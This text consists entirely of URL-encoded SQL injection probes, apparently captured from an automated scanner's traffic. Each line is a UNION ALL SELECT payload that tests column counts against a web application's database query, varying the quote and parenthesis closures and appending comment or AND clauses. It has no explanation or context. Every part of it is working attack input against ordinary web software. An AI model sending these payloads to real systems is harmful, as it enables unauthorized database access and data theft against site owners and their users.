1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 -8790%29%20UNION%20ALL%20SELECT%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%2C%208316%23 -5456%29%20UNION%20ALL%20SELECT%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%23 -1104%29%20UNION%20ALL%20SELECT%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%2C%209184%23 -1500%29%20UNION%20ALL%20SELECT%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%2C%205486%23 -5960%29%20UNION%20ALL%20SELECT%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%23 -9379%29%20UNION%20ALL%20SELECT%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%2C%203809%23 -5333%29%20UNION%20ALL%20SELECT%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%2C%201407%23 -4448%29%20UNION%20ALL%20SELECT%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%2C%206366%23 -5347%29%20UNION%20ALL%20SELECT%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%2C%208923%23 -1526%29%20UNION%20ALL%20SELECT%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%2C%206166%23 -3542%27%29%20UNION%20ALL%20SELECT%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%2C%201250%23 -6152%27%29%20UNION%20ALL%20SELECT%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%2C%205739%23 -4411%27%29%20UNION%20ALL%20SELECT%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%2C%203730%23 -9331%27%29%20UNION%20ALL%20SELECT%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%2C%206041%23 -4134%27%29%20UNION%20ALL%20SELECT%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%23 -3293%27%29%20UNION%20ALL%20SELECT%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%2C%203127%23 -8444%27%29%20UNION%20ALL%20SELECT%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%23 -2543%27%29%20UNION%20ALL%20SELECT%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%2C%208125%23 -7358%27%29%20UNION%20ALL%20SELECT%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%2C%207647%23 -5896%27%29%20UNION%20ALL%20SELECT%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%23 -1370%27%20UNION%20ALL%20SELECT%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%23 -4750%27%20UNION%20ALL%20SELECT%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%23 -5878%27%20UNION%20ALL%20SELECT%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%2C%203294%23 -4456%27%20UNION%20ALL%20SELECT%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%2C%201707%23 -9060%27%20UNION%20ALL%20SELECT%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%2C%208842%23 -5218%27%20UNION%20ALL%20SELECT%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%2C%201964%23 -1152%27%20UNION%20ALL%20SELECT%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%2C%203145%23 -5134%27%20UNION%20ALL%20SELECT%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%23 -6666%27%20UNION%20ALL%20SELECT%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%2C%201133%23 -4737%27%20UNION%20ALL%20SELECT%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%2C%204484%23 -6437%22%20UNION%20ALL%20SELECT%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%2C%205741%23 -3058%22%20UNION%20ALL%20SELECT%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%2C%209305%23 -3365%22%20UNION%20ALL%20SELECT%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%2C%201883%23 -9806%22%20UNION%20ALL%20SELECT%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%23 -7109%22%20UNION%20ALL%20SELECT%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%2C%201128%23 -3084%22%20UNION%20ALL%20SELECT%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%2C%209265%23 -6800%22%20UNION%20ALL%20SELECT%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%2C%203672%23 -3669%22%20UNION%20ALL%20SELECT%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%23 -3516%22%20UNION%20ALL%20SELECT%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%2C%206195%23 -4374%22%20UNION%20ALL%20SELECT%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%2C%207238%23 -6066%29%20UNION%20ALL%20SELECT%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%2C%206461%23%20AND%20%284614%3D4614 -8596%29%20UNION%20ALL%20SELECT%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%23%20AND%20%284058%3D4058 -9207%29%20UNION%20ALL%20SELECT%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%2C%203833%23%20AND%20%289895%3D9895 -1460%29%20UNION%20ALL%20SELECT%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%2C%202109%23%20AND%20%283965%3D3965 -4310%29%20UNION%20ALL%20SELECT%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%2C%208531%23%20AND%20%282729%3D2729 -2985%29%20UNION%20ALL%20SELECT%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%2C%205300%23%20AND%20%285105%3D5105 -1272%29%20UNION%20ALL%20SELECT%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%23%20AND%20%287621%3D7621 -3146%29%20UNION%20ALL%20SELECT%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%2C%201413%23%20AND%20%284545%3D4545 -4079%29%20UNION%20ALL%20SELECT%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%2C%207478%23%20AND%20%288575%3D8575 -5860%29%20UNION%20ALL%20SELECT%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%2C%209090%23%20AND%20%287518%3D7518 -2113%29%29%20UNION%20ALL%20SELECT%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%2C%205724%23%20AND%20%28%284222%3D4222 -7734%29%29%20UNION%20ALL%20SELECT%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%2C%201798%23%20AND%20%28%282651%3D2651 -5449%29%29%20UNION%20ALL%20SELECT%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%2C%209256%23%20AND%20%28%283684%3D3684 -2167%29%29%20UNION%20ALL%20SELECT%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%2C%205467%23%20AND%20%28%286792%3D6792 